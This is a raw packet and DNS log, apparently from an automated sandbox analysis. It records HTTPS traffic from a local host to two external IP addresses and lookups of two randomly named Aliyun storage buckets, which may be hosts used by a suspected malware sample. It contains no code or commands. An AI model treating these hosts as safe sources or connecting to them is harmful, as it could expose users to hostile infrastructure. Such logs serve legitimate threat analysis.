                                                    Jan 6, 2025 04:43:41.627239943 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:41.627243042 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:41.627296925 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:41.627300978 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:41.627317905 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:41.627446890 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:41.627453089 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:41.627469063 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:41.627619982 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:41.627656937 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:41.839340925 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:41.839425087 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:41.967262030 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:41.967269897 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:41.967283964 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:41.967346907 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:41.967395067 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:42.089546919 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:42.089560032 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:42.089634895 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:42.436213970 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:42.553025961 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:43.068881989 CET49978443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:43.068913937 CET4434997839.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:43.293597937 CET49979443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:43.293664932 CET4434997939.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:43.293761969 CET49979443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:43.294059992 CET49979443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:43.294075966 CET4434997939.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:44.608742952 CET4434997939.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:44.610938072 CET49979443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:44.611572981 CET49979443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:44.611581087 CET4434997939.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:44.611810923 CET49979443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:44.611815929 CET4434997939.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:44.950752020 CET4434997939.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:44.950774908 CET4434997939.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:44.950900078 CET49979443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:44.950922966 CET4434997939.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:44.950969934 CET49979443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:44.951070070 CET4434997939.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:44.951118946 CET49979443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:44.951545954 CET4434997939.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:44.951587915 CET49979443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:44.952140093 CET4434997939.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:44.952207088 CET49979443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:45.043175936 CET4434997939.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:45.043232918 CET4434997939.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:45.043278933 CET4434997939.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:45.043333054 CET49979443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:45.043354988 CET4434997939.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:45.043366909 CET49979443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:45.043395042 CET49979443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:45.043396950 CET4434997939.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:45.043454885 CET49979443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:45.044105053 CET49979443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:45.044121027 CET4434997939.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:45.059439898 CET49980443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:45.059489965 CET4434998039.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:45.059578896 CET49980443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:45.059808969 CET49980443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:45.059822083 CET4434998039.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:46.241836071 CET4434998039.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:46.242922068 CET49980443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:46.243544102 CET49980443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:46.243555069 CET4434998039.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:46.243796110 CET49980443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:46.243802071 CET4434998039.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:46.569730997 CET4434998039.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:46.569761038 CET4434998039.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:46.569885015 CET49980443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:46.569915056 CET4434998039.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:46.570265055 CET4434998039.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:46.570292950 CET4434998039.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:46.570316076 CET49980443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:46.570323944 CET4434998039.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:46.570333004 CET49980443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:46.570352077 CET49980443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:46.570661068 CET4434998039.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:46.570719004 CET4434998039.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:46.570761919 CET49980443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:46.570903063 CET49980443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:46.570918083 CET4434998039.103.20.26192.168.2.9
                                                    Jan 6, 2025 04:43:46.570931911 CET49980443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:46.570954084 CET49980443192.168.2.939.103.20.26
                                                    Jan 6, 2025 04:43:59.043340921 CET49981443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:43:59.043387890 CET44349981118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:43:59.043515921 CET49981443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:43:59.078807116 CET49981443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:43:59.078834057 CET44349981118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:00.411509991 CET44349981118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:00.411586046 CET49981443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:00.412272930 CET44349981118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:00.412322998 CET49981443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:00.476728916 CET49981443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:00.476739883 CET44349981118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:00.477094889 CET44349981118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:00.477363110 CET49981443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:00.480300903 CET49981443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:00.527322054 CET44349981118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:00.843446970 CET44349981118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:00.843475103 CET44349981118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:00.843518972 CET49981443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:00.843543053 CET44349981118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:00.843583107 CET49981443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:00.843621969 CET49981443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:00.843760967 CET44349981118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:00.843815088 CET49981443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:00.845423937 CET44349981118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:00.845469952 CET49981443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:00.849997044 CET44349981118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:00.850065947 CET49981443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:00.934129000 CET44349981118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:00.934186935 CET44349981118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:00.934227943 CET49981443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:00.934245110 CET44349981118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:00.934256077 CET49981443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:00.934283018 CET49981443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:00.934693098 CET44349981118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:00.934745073 CET49981443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:00.935457945 CET44349981118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:00.935514927 CET49981443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:00.935599089 CET44349981118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:00.935646057 CET49981443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:00.935651064 CET44349981118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:00.935712099 CET44349981118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:00.935725927 CET49981443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:00.935755968 CET49981443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:00.935813904 CET49981443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:00.935827971 CET44349981118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:02.689934015 CET49982443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:02.689987898 CET44349982118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:02.690062046 CET49982443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:02.690454006 CET49982443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:02.690469027 CET44349982118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:04.136322021 CET44349982118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:04.137042046 CET49982443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:04.137656927 CET49982443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:04.137674093 CET44349982118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:04.137886047 CET49982443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:04.137892962 CET44349982118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:04.503143072 CET44349982118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:04.503213882 CET49982443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:04.503227949 CET44349982118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:04.503353119 CET49982443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:04.504394054 CET49982443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:04.504420042 CET44349982118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:04.514172077 CET49983443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:04.514223099 CET44349983118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:04.514291048 CET49983443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:04.514672041 CET49983443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:04.514683008 CET44349983118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:05.863156080 CET44349983118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:05.863409996 CET49983443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:05.863945961 CET49983443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:08.967096090 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:08.971272945 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:08.971337080 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:08.973429918 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:08.973485947 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:08.977552891 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:08.977627993 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:08.979655027 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:08.979728937 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:08.981719017 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:08.981787920 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:08.985852957 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:08.985971928 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:08.988135099 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:08.988184929 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:08.992312908 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:08.992405891 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:08.994333982 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:08.994390011 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:08.998485088 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:08.998541117 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:08.998682976 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:08.998691082 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:08.998966932 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.002655983 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.002731085 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.007030964 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.007080078 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.007083893 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.007091999 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.007123947 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.007180929 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.011176109 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.011220932 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.011245966 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.011251926 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.011290073 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.012371063 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.015294075 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.015337944 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.021367073 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.021437883 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.021608114 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.021665096 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.025490046 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.025608063 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.025614023 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.025619030 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.025682926 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.031608105 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.031743050 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.031794071 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.031909943 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.033544064 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.033586025 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.039012909 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.039063931 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.039134979 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.039184093 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.042885065 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.043001890 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.043134928 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.043196917 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.049200058 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.049295902 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.049314976 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.049321890 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.049333096 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.049410105 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.053328037 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.053380013 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.143615961 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.143671036 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.146382093 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.146585941 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.148472071 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.148523092 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.150479078 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.150532961 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.154575109 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.154628038 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.156769991 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.156825066 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.161017895 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.161077023 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.163256884 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.163331032 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.165287971 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.165653944 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.169487953 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.169626951 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.171502113 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.171564102 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.175689936 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.175756931 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.177808046 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.177861929 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.180155039 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.180205107 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.184118986 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.184168100 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.186089039 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.186898947 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.190104008 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.190160036 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.192166090 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.192219973 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.196274996 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.196552038 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.198304892 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.198520899 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.200552940 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.200740099 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.204473019 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.204538107 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.206525087 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.206604004 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.208609104 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.208666086 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.209758043 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.209845066 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.211102962 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.211163998 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.213581085 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.213789940 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.214858055 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.214910030 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.217365980 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.217470884 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.218703032 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.218899012 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.219898939 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.219948053 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.222419977 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.222620964 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.234149933 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.234229088 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.234251022 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.234265089 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.234277964 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.234338045 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.236887932 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.236958981 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.236975908 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.237025023 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.243073940 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.243216991 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.243274927 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.243274927 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.243284941 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.243911982 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.249449015 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.249586105 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.249594927 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.249713898 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.255848885 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.255907059 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.255929947 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.255978107 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.262003899 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.262053013 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.262218952 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.262305021 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.475327969 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.475806952 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:09.687324047 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:09.687733889 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:10.111337900 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:10.111423016 CET49984443192.168.2.9118.178.60.9
                                                    Jan 6, 2025 04:44:10.943332911 CET44349984118.178.60.9192.168.2.9
                                                    Jan 6, 2025 04:44:10.943382025 CET49984443192.168.2.9118.178.60.9
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 6, 2025 04:43:26.350574017 CET | 50197 | 53 | 192.168.2.9 | 1.1.1.1
Jan 6, 2025 04:43:26.698380947 CET | 53 | 50197 | 1.1.1.1 | 192.168.2.9
Jan 6, 2025 04:43:58.880213976 CET | 52272 | 53 | 192.168.2.9 | 1.1.1.1
Jan 6, 2025 04:43:59.021681070 CET | 53 | 52272 | 1.1.1.1 | 192.168.2.9
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 6, 2025 04:43:26.350574017 CET | 192.168.2.9 | 1.1.1.1 | 0x47aa | Standard query (0) | hu5wd1.oss-cn-beijing.aliyuncs.com | A (IP address) | IN (0x0001) | false
Jan 6, 2025 04:43:58.880213976 CET | 192.168.2.9 | 1.1.1.1 | 0x266b | Standard query (0) | 22mm.oss-cn-hangzhou.aliyuncs.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 6, 2025 04:42:01.753597021 CET | 1.1.1.1 | 192.168.2.9 | 0x526 | No error (0) | shed.dual-low.s-part-0017.t-0009.t-msedge.net | s-part-0017.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
